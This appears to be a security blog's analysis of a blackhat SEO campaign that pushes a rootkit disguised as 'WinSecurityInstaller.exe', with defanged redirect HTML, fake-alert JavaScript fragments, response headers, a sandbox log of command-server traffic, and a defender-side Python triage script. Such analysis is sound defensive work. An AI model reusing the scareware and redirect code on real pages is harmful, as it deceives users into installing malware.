BlackHat SEO Attacks Redirect to 4DW4R3 Rootkit
We have analyzed a new blackhat SEO attack over the last few days and noticed that the main goal of these attacks is no longer the spread of rogue security software: instead they try to spread the dangerous 4DW4R3 rootkit, which may later be used to install a new rogue security software on the victim's computer.
Below is a short analysis of the network traffic we captured while analyzing these new blackhat SEO attacks. The attacks mostly target keywords related to the iPhone, episodes of cartoons and World Cup 2010 matches.
Hijacked URL:
traseusa .com/images/page.php?r=keyword
Response:
<html>
 <head>
  <title></title>
  <meta http-equiv="refresh" content="0; url=hxxp://portalkey .org/?affid=415&subid=landing">
 </head>
 <body>
  <script language="javascript">
   self.location.href = "hxxp://portalkey .org/?affid=415&subid=landing";
  </script>
  <a href="hxxp://portalkey .org/?affid=415&subid=landing">Please Click Here</a>
 </body>
</html>
Domain & IP Analysis:
portalkey .org – 91.212.127.96
The domain portalkey .org is used to show the user fake security alerts and false system scan reports claiming the system is completely infected by trojans:

By analyzing the source of the HTML page, we can see that it uses JavaScript to display the fake alerts and the fake system scan reports. As an example, we have extracted a few lines of code from the infected page:
{
    alert(this.___("Windows Security Center recommends you to install System Security Antivirus."));
    t.MyConfirm();
}

ExitPopupMessage():
ExitPopupMessage : function()
{
    alert( this.___("Your computer remains infected by viruses!") +
        this.___("They can cause data loss and file damages and need to be cured as soon as possible.") + "\n\n" +
        this.___("Return to System Security and download it secure to your PC"));
}
In particular, the above code is executed every time you try to close Internet Explorer, and it forces the infected page to open again in Internet Explorer even if the user clicks the "Cancel" button! This can be seen as persistence code whose main intent is to make sure the user will, sooner or later, click on the malicious page and download the rootkit executable.
clicksmell .org/x92s/uc12vx04/xdtldil.php?id=369
Domain & IP Analysis:
clicksmell .org – 91.188.59.220
At this point the 4DW4R3 executable is requested:
portalkey .org/dl.php?f=XXX&subid=1

Response:
HTTP/1.1 200 OK
Server: nginx/0.7.63
Content-Type: application/octet-stream
Pragma: hack
Content-Length: 11776
Content-Disposition: attachment; filename=WinSecurityInstaller.exe
Content-Transfer-Encoding: binary
Note that the executable is named like the installer of a rogue security product, "WinSecurityInstaller.exe", but in reality it installs the 4DW4R3 rootkit…
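As an added example (not part of the original analysis), the following Python applies two defender-side checks to the captured artifacts above: it pulls the forwarding targets out of the doorway page's meta refresh and script, and it flags the response headers of the payload download (the non-standard Pragma: hack value and an executable attachment served as octet-stream). The sample inputs are the page's own captures, kept defanged; the header heuristics are my own, not something the analysis claims the malware relies on.

```python
import re

# Sample inputs reproduced from the captured traffic above; URLs stay defanged ("hxxp", " .org") as on the page.
REDIRECT_HTML = ('<html> <head> <title></title> <meta http-equiv="refresh" content="0; '
                 'url=hxxp://portalkey .org/?affid=415&subid=landing"> </head> <body> '
                 '<script language="javascript"> self.location.href = '
                 '"hxxp://portalkey .org/?affid=415&subid=landing"; </script> '
                 '<a href="hxxp://portalkey .org/?affid=415&subid=landing">Please Click Here</a> '
                 '</body> </html>')
DOWNLOAD_HEADERS = ('HTTP/1.1 200 OK\r\nServer: nginx/0.7.63\r\n'
                    'Content-Type: application/octet-stream\r\nPragma: hack\r\n'
                    'Content-Length: 11776\r\n'
                    'Content-Disposition: attachment; filename=WinSecurityInstaller.exe\r\n'
                    'Content-Transfer-Encoding: binary\r\n\r\n')

META_REFRESH = re.compile(r'<meta[^>]*http-equiv=["\']refresh["\'][^>]*content=["\']\s*(\d+)\s*;\s*'
                          r'url=([^"\']+)["\']', re.I)
JS_LOCATION = re.compile(r'(?:self|window|top|document)\.location(?:\.href)?\s*=\s*["\']([^"\']+)["\']', re.I)
EXEC_EXT = ('.exe', '.scr', '.com', '.pif', '.bat', '.cmd')   # heuristic list, my own choice


def extract_redirect_targets(html):
    """Distinct URLs the page forwards the visitor to (meta refresh first, then script), in order found."""
    found = [url for _delay, url in META_REFRESH.findall(html)] + JS_LOCATION.findall(html)
    return list(dict.fromkeys(u.strip() for u in found))


def parse_headers(raw):
    """Lower-cased header dict from a raw HTTP response head; the first occurrence of a name wins."""
    headers = {}
    for line in raw.split('\r\n')[1:]:
        if not line:          # blank line ends the head
            break
        name, _, value = line.partition(':')
        headers.setdefault(name.strip().lower(), value.strip())
    return headers


def triage_download_headers(raw):
    """Reasons a download response looks like a dropper; empty list when nothing stands out."""
    h = parse_headers(raw)
    reasons = []
    pragma = h.get('pragma', '')
    if pragma and pragma.lower() != 'no-cache':      # the only value RFC 2616 defines
        reasons.append('non-standard Pragma value: %s' % pragma)
    m = re.search(r'filename\*?=["\']?([^"\';]+)', h.get('content-disposition', ''), re.I)
    filename = m.group(1).strip() if m else ''
    if filename.lower().endswith(EXEC_EXT) and 'octet-stream' in h.get('content-type', ''):
        reasons.append('executable attachment served as octet-stream: %s' % filename)
    return reasons
```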
Cookies:
Cookie: NOT_UNIQUE=1; USER_DATA=XXX; TEMPLATE=XXX; affid=409; subid=landing
We executed the rootkit loader in our sandbox:

Network activity:
GET /a/ad HTTP/1.1
Host: www.searchannoying .org

GET /any3/5-direct.ex HTTP/1.1
User-Agent: wget 3.0
Host: searchannoying .org

POST /css/pragma/knock.php HTTP/1.1
Host: analitycsdead .com

GET /css/pragma/crcmds/main HTTP/1.0
Host: analitycsdead .com

GET /css/pragma/srcr.dat HTTP/1.0
Host: analitycsdead .com

GET /css/pragma/crcmds/install HTTP/1.0
Host: analitycsdead .com

GET /css/pragma/crfiles/serf HTTP/1.0
Host: analitycsdead .com

GET /css/pragma/crfiles/bbr HTTP/1.0
Host: analitycsdead .com

GET /readdatagateway.php?type=stats&affid=415&subid=landing&version=4.0&adwareok HTTP/1.1
User-Agent: wget 3.0
Host: searchannoying .org
Domain & IP Analysis:
searchannoying .org – 91.212.127.96
analitycsdead .com – 62.122.73.242
Files in Temp Directory:

After a few hours, this new window popped up:

Surprise? No… It is a rogue security software installer…



